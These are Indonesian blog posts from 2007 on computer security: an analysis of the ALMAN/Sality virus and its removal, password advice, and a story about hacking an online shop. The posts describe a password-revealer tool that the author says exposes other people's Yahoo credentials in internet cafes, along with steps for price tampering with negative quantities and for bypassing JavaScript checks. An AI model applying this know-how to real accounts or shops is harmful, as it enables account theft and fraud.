Virus yang dikenali dengan nama ALMAN oleh AVG dan Kaspersky ini terbilang cukup unik karena selain kemampuannya menginfeksi file exe, file induk yang dibuatnya cukup sulit dilacak karena bukan berupa file executable tetapi file berekstensi dll sehingga aktivitasnya tidak akan tampak jika dilihat melalui jendela task manager.

Aksi sang virus
Jika menginfeksi system, virus alman akan membuat 2 file di direktori system yakni wmdrtc32.dll dan wmdrtc32.dl_. File wmdrtc32.dll dibuat dengan ukuran sekitar 40 KB, diset beratribut normal. File ini ditugaskan untuk menginjeksi file explorer.exe miliknya windows setiap kali dijalankan. Ini saya ketahui setelah mengintipnya dengan tools gratisan a-squared HijackFree yang sebenarnya juga sedang terinfeksi. Ternyata file wmdrtc32.dll terdaftar sebagai salah satu module yang sedang digunakan oleh file explorer.exe. Demikian halnya file-file executable lain yang telah terinfeksi ketika dieksekusi akan menggunakan file tersebut sebagai salah satu modulnya. Ini mirip dengan aksi yang dilakukan oleh file avmeter32.dll atau avwav32.dll milik virus kspoold. Selanjutnya file wmdrtc32.dl_ berukuran sekitar 26,5 KB dan diset beratribut system dan hidden. Disinilah terlihat kelihaian teknik social engineeringnya karena jika dilihat sepintas lalu, file wmdrtc32.dl_ seolah-olah merupakan file milik windows yang telah direname oleh virus dan digantikan dengan file lain dengan ukuran berbeda. Dengan demikian, kita dapat terkecoh hanya menghapus file wmdrtc32.dll (40 KB) kemudian mengembalikan ekstensi dll pada file wmdrtc32.dl_ (26,5 KB) karena mengira itu filenya windows.
Mengenali file yang terinfeksi

Sebenarnya cukup sulit untuk mengenali file exe yang telah diinfeksi oleh virus ini hanya dengan melihatnya saja. Hal ini disebabkan karena sebagian besar file yang diinfeksinya tetap dapat berjalan dengan normal kecuali beberapa file seperti PCMAV-CLN.exe dan PCMAV-RTP (keduanya antivirus buatan PC Media) yang pernah saya temui.

Namun demikian, sebenarnya jika kita dapat menghafal ukuran file-file executable kita, maka file yang terinfeksi dapat segera dikenali dengan melihat pada perubahan ukuran filenya. Setiap file exe dapat diinfeksi sampai dua kali oleh virus ini, masing-masing dengan penambahan ukuran file sebesar 28 KB dan 40 KB. Maksudnya, jika sebuah file telah terinfeksi dan bertambah ukurannya sebesar 28 KB, maka infeksi selanjutnya akan menambah ukuran file sebesar 40 KB, demikian pula sebaliknya. Jadi, setiap file yang terinfeksi dapat bertambah ukurannnya sebesar 68 KB.

Mematikan Proses Virus
Sebenarnya saya tidak tahu dunia program sama sekali. Jadi saya tidak punya jurus jitu melawan virus ini karena file wmdrtc32.dll tidak dapat di delete begitu saja. Hanya saja karena file dll yang dibuat juga menginfeksi file explorer.exe seperti yang dilakukan oleh kspoold, saya jadi teringat dengan artikel yang pernah saya download dari vaksin.com. Diartikel tersebut ada source code remover sederhana untuk mematikan proses virus sekaligus menghapus file virusnya yang bias dibuat dengan notepad. Source code ini dapat dimodifikasi untuk mematikan proses serta menghapus file wmdrtc32.dll dan wmdrtc32.dl_ yang terdapat di direktori system. Saya tidak menyertakan source codenya disini karena artikelnya akan semakin membengkak ukurannya. Selain itu saya malas dicap suka menjiplak tulisan orang. Jadi kalau mau download sendiri aja di situsnya vaksin.com!
Membersihkan file terinfeksi

Lantas bagaimana nasib file-file exe yang telah terinfeksi? Sampai saat ini, liris terakhir PCMedia yakni PCMedia RC22 belum mengenal virus Alman sama sekali, sedangkan Ansav mengenalnya dengan nama Sality tetapi tidak dapat membersihkannya, file terinfeksi akan dihapus. Hal tersebut tidak berbeda jauh dengan Anti Virus AVG yang hanya main delete saja ketika bertemu virus ini. Berhubung karena saya bukan seorang programmer dan tidak tahu-menahu sama sekali seputar dunia pemrograman, saya hanya mengandalkan kaspersky (bisa juga pake McAfee) update baru yang telah dapat mengenal virus ini dengan baik serta dapat membersihkan file-file yang terinfeksi meskipun tidak semua file dapat dibersihkan dengan sempurna.

Thanks to :

1. Dosen dan Ketua jurusanku yang telah membantuku melepaskan diri dari jurang DO 31 Agustus lalu

2. Vee yang telah memberiku pelajaran sangat berharga meskipun menyakitkan

3. Mua-muanya dech

eL!t!zT

Rabu, 12 Desember 2007

Pemberitahuan

Pemberitahuan, Bahwa mulai hari senin topik yang dibahas di blog saya ini tidak selalu Hack, hal ini dikarenakan diskusi panjang saya dengan Toni dan Mawarta (Anak STMIK JAYAKARTA) Dan Beberapa Dosen yang ahli dalam bidangnya (Baik itu Dosen BUNDA MULIA, JAYAKARTA , BINUS , BUNG KARNO , SUPRA). Saya sebagai penulis memutuskan bahwa kita harus mengembangkan diri. Baik itu disekuriti , web, programming , pengetahuan umum. Salah satu artikel yang membuka mata saya adalah “HOW TO BECOME A HACKER" bahwa untuk menjadi seorang hacker kita sebenarnya wajib mempelajari Networking (jaringan) , Programing , Sistem Operasi , Internet. Untuk programing saya akan membelahnya menjadi dua yang pertama saya beri nama Visual yang membahas dari Visual Basic,Delphi, C#, sampai terakhir Oracle Form,yang kedua adalah Non Visual yang akan membahas C++,Perl,Phyton,Java. Untuk semua artikel programing akan diajarkan dari dasar hingga ke bentuk aplikasi jadi.Untuk Web saya akan banyak menulis tentang HTML, Javascript, ASP, PHP. Untuk pengetahuan umum akan dibahas seputar masalah komputer dan aplikasi dasar seperti Office dan akan memabahas pula tentang sistem operasi, pokoknya hal-hal yang umum deh, Untuk sekuriti kita akan tetap membahas Hacking dan bagaimana memproteksinya. Adapun pembahasannya menghabiskan satu topik terlebih dahulu. Contoh pas programing saya membahas Visual Basic maka saya akan menyalesaikan vb sampai aplikasi jadi lalu saya akan berganti topik ke delphi, begitu juga dengan yang lain. Berikut ini saya akan memberitahukan jadwal menulis saya :
1.Senin Pemrograman Visual Dimulai Dari Visual Basic
2.Selasa Sekuriti 1
3.Rabu Web
4.Kamis Pengetahuan Umum 1
5.Jumat Pemrograman Non Visual Dimulai dari C++
6.Sabtu Sekuriti 2
7.Minggu Pengetahuan Umum 2
Mungkin banyak bertanya kenapa pemrograman dibagi menjadi dua. Tujuan mempelajari non visual adalah untuk melatih logika pemrograman kita, jadi lebih kearah pemanfaatan logika, sehingga mungkin kita nanti lebih banyak bicara bagan alur untuk melatih logika. Tujuan Visual adalah membantu teman-teman yang sudah bekerja untuk mengembangkan diri dalam mengejar karir.

Selasa, 11 Desember 2007

Bad & Good Password

Beberapa orang memang terkadang menjadikan sebuah password itu adalah kata-kata yang mudah diingat, seperti nama istri,nama pacar atau tanggal lahir(Hanya mengulang agar tidak lupa). Seperti yang kita bahas kemarin bahwa password yang seperti itu masuk kedalam Bad Password, lalu apa saja sih yang menjadi tanda bahwa pasword itu buruk ? Tanda-tanda paswword yang buruk adalah:
1.Terdiri dari 2 sampai 7 karakter atau kurang
2.Terdiri dari satu suku kata misalnya makan, minum, bunga, indah dan lain-lain
3.Tidak Terdiri dari campuran angka dan huruf
4.Terdiri dari campuran dan huruf tetapi masih ada artinya
5.Terdiri dari Tanggal Lahir
Jika password merupakan salah satu tanda diatas , cracker dengan mudah menggunakan list dari kamus yang biasa dimasukkan ke cracklist mereka.Dibawah ini akan ada contoh password yang mudah diambil oleh craker:
12345,abc123,password,computer,123456,tigger,1234,a1b2c3,xxx
Jika teman-teman masih mempunyai password yang terdapat disalah satu contoh diatas maka .... Selamat anda termasuk orang yang mempunyai password yang buruk.
Kalau kita sudah mengetahui apa yang dimaksud dengan bad password lalu apa yang dimaksud dengan Good Password. Password yang baik terkadang sangat susah sekali mengingat password tesebut, biasanya terdiri atas minimal dari dua suku kata atau kombinasi beberapa angka dan huruf. Apa yang menjadi tanda bahwa password kita tergolong yang baik
1.Terdiri dari 7 karakter atau lebih
2.Terdiri dari suku kata atau lebih
3.Terdiri dari campuran angka dan huruf
4.Tidak terdiri dari tanggal lahir
Contoh password yang baik adalah sebagi berikut: minumair,bungacitralestari,1xx2bgh, vb3660
Hal tersebutuntuk menghindari kemudahan peng-crak-an password sehingga memaksa cracker untuk berpikir dua kali. Tentu saja semua yang kita bahasa akan menjadi sia-sia bila kita mencatat password kita dikertas atau bahkan dinotepad. He.. jangan heran kenapa saya masing sering menjumpai teman-teman saya masih mencatat password di notepad. Bagi teman-teman yang sudah mengerti silakan mencoba memproteksi password kalian masing-masing, Bagi yang belom mengerti ulangi membaca artikel yang kemarin tentang Snad boy Tool.

Kelemahan Password

Terkadang orang sering menyepelekan password, padahal password sendiri adalah sesuatu yang penting. Orang sering salah kaprah dengan membuat password yang mudah diingat, seperti nama pacar, nama istri, tanggal lahir, jabatan. Hal tersebut sebenarnya secara tidak sengaja membuat suatu lubang yang sangat besar didalam sistem keamanan.Seorang penyusup akan dengan mudah mengambil password kita jika apa yang ditulis diatas masih kita pakai. Password sama seperti kunci rumah kita, kalau kita sering menyimpan kunci kedalam pot, atau dibawah kesat (Hal ini sering dilakukan anak kost). Maka seorang yang handal dapat menjadi penjahat, karena dia mengetahui tempat penyimpanan kunci itu. Begitu juga dengan password, jika kita mempunyai password 'default'(Biasanya Password admin pada waktu penginstall xp dikosongkan), maka dengan mudah cracker akan dengan mudah menebak password anda, bisanya password yang sering digunakan oleh user sama seperti yang disebut diatas. Perlu diingat seorang cracker pasti lebih pintar dari kita untuk mendapatkan informasi tentang kita dari manapun. Jadi saya berharap setelah membaca artikel ini kita dapat membuat password yang cukup membuat cracker menjadi pusing.Jangan biarkan cracker mengambil passwordmu dengan mudah, Besok kita akan membahas apa yang disebut Bad Password(Password yang Buruk) dan Good Password (Password yang Baik). Belajarlah menggunakan password bukan saja yang gampang diingat tetapi juga yang baik. Semua ini untuk kemajuan ilmu pengetahuan dan kemajuan bersama dalam bidang keamanan data.

Snadboy tool

Software ini katanya bis menemukan password dengan karakter bintang(*) ataupun bulat sepertio di aplikasi Yahoo Messenger. Pada saat diuji coba oleh saya sih hanya pada YM dong yang berhasil. Oke daripada jadi bengong dan lalat masuk, mari kita coba saja. Pertama carilah Tolls yang bernama snadboy's Revelation, kedua anda harus menginstall dahulu program Snadboy, cara penginstallan say tidak bahas karena hanya next,next,jadi deh. ketiga bukalah program snadboy. Lalu bagaimana car melihat passwordnya ? O ya hampir lupa caranya adalah anda tinggal klik dan drag lambang + yang berada dalam bulatan lalu arahkan kekarakter password asterix yang anda ingin lihat passwordnya. Benar khan saya bilang, penggunaan program ini sangat mudah sekali. Pengalaman saya bermain internet diwarnet banyak sekali ditemukan Yahoo id dan passwordnya dengan program seperti ini kita dapat melihat passwordnya, sayangnya program ini ketika saya coba hanya berhasil pada YM saja. Apa anda belom mendapatkan Snadboy lalu untuk apa membaca sekian panjang, gimana toh. Oke Snad boy dapat didapatkan di situs http://www.snadboy.com/ bagi yang diblok dapat mencoba melewatinya dengan situs-situs yang sudah saya jelaskan terlebih dahulu, oya kedepan saya hanya akan menjelaskan Tools yang banyak digunakan oleh peyusup untuk memudahkan langkanya. Besok sih kalau engga ada halangan saya akan menuliskan teknik SQL Injection yang pernah digunakan oleh teman kita Toni.Ingat Semua ini untuk kemajuan Ilmu pengetahuan bukan untuk menjadi Penjahat.

Senin, 10 Desember 2007

Informasi Tambahan Hacker

Tampaknya judul diatas memang terlalu berlebihan. Yah, karena saya akan menunjukkan kepada anda bagaimana mengikuti dunia security yang selalu berkembang agar anda tidak ketinggalan. Ada beberap site yang saya rekomendasikan buat teman-teman diantaranya:
www.jasakom.com
situs ini sangat baik untuk menambah pengetahuan kita disitus ini memusatkan perhatiannya pada masalah keamanan yang berhubungan dengan komputer. Situs ini bertambah keren dikarenakan banyaknya penulis buku yang bergabung disini.
www.astalavista.bok.sk
Situs ini adalah situs yang paling lengkap dan segala informasi yang anda butuhkan untuk belajar ada disini.
www.infosekuriti.com
Situs ini lebih banyak bercerita tentang sekuriti. Situs ini dikelola oleh seorang yang berbakat yaitu Xnuxer. Seorang yang menghack situs KPU
www.kecoak.or.id
Situs ini merupakan situs yang paling tua yang membahas tentang masalah hacking dalam bahasa indonesia
www.neoteker.or.id
Situs ini didukung oleh majalah Noetek yang memberikan informasi seputar keamanan komputer dalam bahasa indonesia.

Situs-situs tersebut dapat diakses semoga saja dapat membantu teman-teman dalam mempelajari keamanan komputer lebih lanjut. Dengan judul diatas bukan berarti saya akan pensiun menulis disini tetapi saya ingin memacu diri sendiri supaya situs ini dapat berkembang dan bisa berguna bagi orang banyak, Buat Teman-teman yang udah setia baca situs ini saya ucapkan terima kasih. Saya masih mengharapkan komentar dari teman -teman so beri saya komentar yah

Apa yang salah

Apa yang salah dalam kita belajar baik itu dari Dosen tercinta dan dari buku ? Topik ini jadi menarik minat saya untuk mengangkatnya sebagai Posting saya. Dalam kita belajar Bahasa pemrograman kita sering dijebak baik itu sengaja atau tidak sengaja untuk mempermudah hacker untuk melakukan serangan baik itu terhadap aplikasi yang kita buat ataupun server kita. Lalu dimana kesalahannya, kesalahannya terletak keseragaman coding yang dibuat. Sebagai contoh saya memakai Bahasa pemrograman Visual Basic ketika kita sudah membuat sebuah textbox kebiasaan yang diturunkan dari dosen adalah ganti nama textbox1 menjadi txtuser. Sepintas lalu memang ada baiknya sehingga pembacaan coding jauh lebih mudah, tetapi bagaimana kalau coding itu jatuh ketangan yang salah. Sayangnya banyak dosen yang masih text book dalam mengajar sehingga apa yang diajarkan tidak jauh berbeda dengan buku. Bayangkan jika semua aplikasi menggunakan cara diatas setiap kali hacker ingin melalukan serangan mereka tinggal mencari txtuser. Parahnya lagi ini juga terjadi dalam pembuatan database . Kita juga dibiasakan membuat table yang isinya user dan password dengan nama tbl_user, user. Hal ini biasanya diajarkan dosen kepada kita, kalau diselidiki kenapa dosen mengajarkannya kepada kita ?. Banyak yang akan bilang karena buku mengajarkan demikian. Terlihat disini adanya pembunuhan kreativitas kita sebagai pembuat aplikasi. Setidaknya itulah yang saya rasakan pada ujian tengah semester pada salah satu matakuliah bahasa pemrograman. Coding yang sangat mirip dengan apa yang diajarkan itulah yang bernilai sangat tinggi, jadi dapat dikatakan jaman sekarang adalah jaman yang dibuat untuk menghapal coding bukan untuk mengerti coding. Coding yang gampang dibaca sangat disukai oleh penyusup karena akan sangat mudah untuk dibaca. Konsep belajarpun telah berubah, nilai menjadi proritas utama bukan lagi skill maka tidak heran dibeberapa kampus ujian bahasa pemrograman soalnya sama dengan apa yang telah dipraktekan. Saya disini bukan mau menjelek-jelekan siapa- siapa hanya ingin membenahkan apa yang salah, hal ini disebabkan saya berpikir dengan cara Hacker. Beberapa hari lalu saya bertemu dengan anak semester 5 salah satu sekolah tinggi ilmu komputer *********, yang belom tahu apa saja kelemahan java script yang diajarkan dikampus. Moga-moga saja mereka membaca apa yang saya tulis sehingga mereka mengerti. Buat Para Dosen yang membaca artikel ini jangan tersingung buatlah mahasiswa/i menjadi kreatif bukan memudahkan mahasiswa yang mengakibatkan mahasiswa/i menjadi bodoh.Hati-hatilah mengajarkan sesuatu jangan anda mengajarkan sesuatu sehingga menjadi bumerang waktu mahasiswa/i pada dunia kerjanya . Bila perlu ajarkan keamanan program atau aplikasi. Menurut saya itu lebih penting daripada memaksa sesuatu yang tidak penting seperti penggantian nama.

Java Script Matikan saja

Setelah merasa aman, merekapun akhirnya pulang kerumah mereka masing-masing. Tapi yang terjadi pada keesokan harinya ? Keesokan harinya, kejadian yang sama terjadi lagi. Lagi-lagi barang-barang mereka yang dijual dengan harga yang sangat murah bahkan ada juga yang gratis. Apalagi yang salah ? Proteksi dengan java script adalah suatu kebodohan karena java script pada dasarnya adalah script yang dijalankan oleh browser. Masalahnya kita sebagai client mempunyai kontrol penuh atas script tersebut, artinya adalah kita dengan mudah bisa menonaktifkan java script dan melewatinya.Cara melewati proteksi oleh java script ini cukup mudah, dari IE(Internet Expoler) pilih tools terus internet optios terus custom level terus scripiting terus active Scripting kita disable. Mereka bertekad untuk memulai usaha dari apa yang tersisa dan percaya bahwa dengan sistem dengan yang aman. Dengan bantuan mahasiswi yang mereka percaya, mereka memperbaiki situs mereka. Pengecekan dengan java script akhirnya dibuang digantikan dengan program server side yaitu ASP. Program ASP ini akan mengecek angka minus dan otomatis akan menggantinya menjadi angka plus. Dengan Teknik ini hacker tidak akan lagi mungkin memasukan angka minus. Apa sih yang menjadi kesimpulan panjang cerita ini.Kesimpulannya adalah firewall tidak akan menjamin anda aman dari serangan Hacker, 70 % hacking dilakukuan melalui port 80, Tidak perlu pengetahuan yang rumit untuk menjadi seorang penyusup, serangan tidak selalu dari orang luar, jangan mengunakan script client side untuk melakukan sesuatu yang penting, jangan percaya dengan informasi yang dikirimkan, lakukanlah pengecekan ulang sekali lagi pada server side cek dan cek lagi. Besok saya coba menyoroti sistem pembelajaran kita yang salah sehingga memudahkan Hacker.Jangan lupa ini hanya untuk kemajuan ilmu pengetahuan.

Minggu, 09 Desember 2007

Kita diajarkan menjadi Hacker

Memang benar Kita telah diajarkan menjadi Hacker dari taman kanak-kanak. Toni telah memanfaatkan perhitungan dasar matematika untuk melakukan Hacking pada saat memesan barang. Hacker memasukkan angka minus sehingga total dari penjumlahan menjadi berkurang. Sebagai contoh, dengan membeli barang Rp 1000000 sebanyak 1 buah dan memesan barang seharga Rp 999000 sebuah maka total yang harus dibayar adalah -1*1000000+1*999.000 sama dengan 1000. Sebenarnya masih banyak situs yang tidak melakukan pengecekan yang sangat sederhana ini. Ini merupakan bukti bahwa kita dari kecil telah dijarkan menjadi seorang hacker. Setelah ditolong oleh mahasiswi terebut dengan memberi semangat akhirnya tiga sekawan tidak menyerah dan tetap bersemangat sesuai dengan ajaran Buku " Berani Gagal ". Dengan Bantuan mahasiswi tersebut, merekapun menambahkan Javascript kedalam situs mereka untuk mencegah pemasukan karakter selain 0-9. Jadi Pemasukan minus otomatis akan dicegah. Setelah dilakukan pengetesan selama tiga hari akhirnya situs mereka diaktifkan kembali. Melihat situs ini aktif kembali Toni sangat senang, karena dia dapat belanja murah lagi. Tiga sekawan itu pun akhirnya pulang kerumah masing-masing. Mungkin banyak pembaca yang bingung kenapa mahasiswi itu tetap saja dipakai walaupun sudah berkali-kali diketahui bahwa web yang dibuatnya banyak kelemahannya. Tapi itulah yang terjadi, jadi dapat dikatakan karena ini terjadi karena ketiga sekawan tersebut terbuai oleh paras mahasiswi tersebut, atau jangan-jangan mahasiswi tersebut memakai susuk kali yah. By The Way cerita ini akan terus berlanjut dikarenakan teman kita terus berkembang dalam ilmu Hacknya jadi jangan sampai ketinggalan episode berikutnya yah.

Nice sql

Masuk ke miinggu kedua, semua dealer komplain karena uang yang mereka setorkan hilang ketika mereka hendak membeli barang.Hal ini membuat tiga sekawan mengalami kerugian yang sangat besar. Akhirnya mereka kembali ke mahasiswi tersebut, Setelah diadakan penyelidikan maka diketahuilah bahwa adanya kelemahan terhadap serangan Sql Injection. Tiga sekawan itupun dengan bantuaan mahasiswi itu segera memperbaiki permasalaha nini dengan menetapkan bahwa semua nama login dan password untuk dealer haruslah berupa karakter "a" -"z" selain karekter tersebut akan ditolak oleh system sehingga teknik SQL Injection tidak akan dimungkinkan lagi. Walaupun telah diperbaiki, tiga sekawan sudah putus ada dan memutuskan untuk menutup situs dan berhenti sama sekali dari bisnis online. Pada saat mereka ingin pulang datanglah mahasiswi yang memberikan kepada mereka sebuah buku yang berjudul "Berani Gagal" karangan Billi P.S.Lim yang ternyata sangat berkhasiat. Mereka sangat bersemangat kembali seperti seorang samurai, akan tetapi ada sebuah berita burik bagi Alex, yaitu Toni mengudurkan diri dari tokonya dengan alasan mendapat pekerjaan yang lebih baik sebagai Staff Jaringan disebuah Tour Travel. Tanpa merasa curiga Alex menyetujui pengunduran diri Toni Tersebut. Besok paginya tiga sekawan ingin mengecek bisnis mereka, tidak lupa membawa mahasiswi tersebut. Setelah mereka melihat situs mereka, marahlah mereka karena kali ini mereka mendengar kabar bahwa semua barang - barang dagangan mereka terjual dengan harga dibawah 1000 rupiah. Apa yang dilakukan Toni kita akan Bahas besok